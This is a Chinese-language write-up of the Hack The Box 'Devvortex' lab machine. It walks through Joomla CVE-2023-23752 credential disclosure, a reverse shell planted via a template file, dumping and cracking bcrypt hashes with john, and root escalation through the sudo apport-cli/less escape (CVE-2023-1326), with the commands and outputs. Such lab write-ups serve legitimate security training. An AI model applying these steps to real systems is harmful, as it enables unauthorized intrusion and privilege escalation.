信息搜集

80端口

1
2
3
4
5
6
7
8
9
sudo nmap -p- -sT --min-rate 5000  10.10.11.242
Nmap scan report for devvortex.htb (10.10.11.242)
Host is up (0.36s latency).
Not shown: 64138 closed tcp ports (conn-refused), 1395 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 77.24 seconds

访问http://10.10.11.242 得到http://devvortex.htb/,添加到/etc/hosts

子域名

寻找一番过后没有找到利用点,尝试信息搜集

1
ffuf -u http://devvortex.htb -H "Host: FUZZ.devvortex.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -fc 302

http://dev.devvortex.htb/添加到hosts文件,信息搜集,得到后台地址,Joomla cms

CVE-2023-23752

1
http://dev.devvortex.htb/administrator/

searchsploit Joomla扫出一堆漏洞,最终确定为CVE-2023-23752

1
Joomla! v4.2.8 - Unauthenticated information disclosure  |php/webapps/51334.py

发现两个用户,得到用户为lewis的密码为P4ntherg0t1n5r3c0n##

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
└─$ ./51334.py http://dev.devvortex.htb 
Users
[649] lewis (lewis) - lewis@devvortex.htb - Super Users
[650] logan paul (logan) - logan@devvortex.htb - Registered

Site info
Site name: Development
Editor: tinymce
Captcha: 0
Access: 1
Debug status: false

Database info
DB type: mysqli
DB host: localhost
DB user: lewis
DB password: P4ntherg0t1n5r3c0n##
DB name: joomla
DB prefix: sd4fg_
DB encryption 0

www-data

webshell

连接ssh失败后,使用账号密码进入后台,发现可以修改‎/templates/cassiopeia/error.php,写入反弹shell,再访问这个文件,即可getwebshell,但是时www-data用户,

1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[/usr/…/exploitdb/exploits/php/webapps]
└─$ nc -lnnp 5555
Linux devvortex 5.4.0-167-generic #184-Ubuntu SMP Tue Oct 31 09:21:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
 07:17:27 up 58 min,  3 users,  load average: 0.00, 0.02, 0.03
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
logan    pts/1    10.10.14.26      07:06    9:51   0.05s  0.05s -bash
logan    pts/2    10.10.14.26      07:10    5:48   0.05s  0.05s -bash
logan    pts/3    10.10.14.26      07:15    1:42   0.04s  0.04s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh: 0: can't access tty; job control turned off
$ whoami
www-data

数据库

登陆数据库,寻找logan用户的密码

1
2
3
4
5
6
7
8
9
10
11
mysql -h localhost -u lewis -p
Enter password: P4ntherg0t1n5r3c0n##

mysql> select username,password from sd4fg_users;
select username,password from sd4fg_users;
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| lewis    | $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u |
| logan    | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 |
+----------+--------------------------------------------------------------+

john爆破密码

将logan的密码写入到hash文件,利用john工具爆破,得到密码:tequieromucho 

1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿kali)-[~/桌面]
└─$ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tequieromucho    (?)     
1g 0:00:00:07 DONE (2023-12-08 15:35) 0.1254g/s 176.1p/s 176.1c/s 176.1C/s lacoste..harry
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

su logan切换到logan是遇到一个问题,需要升级shell才能成功切换用户;

再docker中su username,可能会报must be run from terminal;解决方案:clink me

用的比较多的解决方案:

1
python3 -c "import pty; pty.spawn('/bin/bash')"

logan

登陆成功后sudo -l,发现可以执行/usr/bin/apport-cli

1
2
3
4
5
6
7
8
9
10
11
logan@devvortex:/$ sudo -l
sudo -l
[sudo] password for logan: tequieromucho

Matching Defaults entries for logan on devvortex:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User logan may run the following commands on devvortex:
    (ALL : ALL) /usr/bin/apport-cli

Google一下sudo apport-cli,经过搜集,得到一个CVE-2023-1326

CVE-2023-1326

1.使用命令生成.crash文件

1
2
3
4
5
6
7
8
#第一种
sleep 100 &
ps aux|grep sleep
kill -SEGV <pid>

#第二种
sleep 100 &
killall -SIGSEGV sleep

该文件在/var/crash目录下。

2.使用apport-cli处理该文件,选择V选项,该程序会使用less作为查看报告的方式。

1
2
3
4
sudo apport-cli -c /var/crash/xxx.crash
输入:v
等一段时间后输入:!/bin/bash
即可得到shell

总结

nmap发现开放80端口,是一个静态页面,没有找到利用点,接着信息搜集找到一个子域名dev,在这个子域名下找到joomla cms,并且可以发现后台登陆页面,再网上可以找到CVE-2023-23752,或者利用工具searchsploit Joomla得到账号密码,ssh登陆无果之后,用账号密码进入后台发现‎/templates/cassiopeia/error.php可以利用;连接webshell,从数据库中可以发现logan的密码,john爆破密码,登陆logan账号,sudo -l后发现可以sudo apport-cli再次利用CVE-2023-1326提升权限到root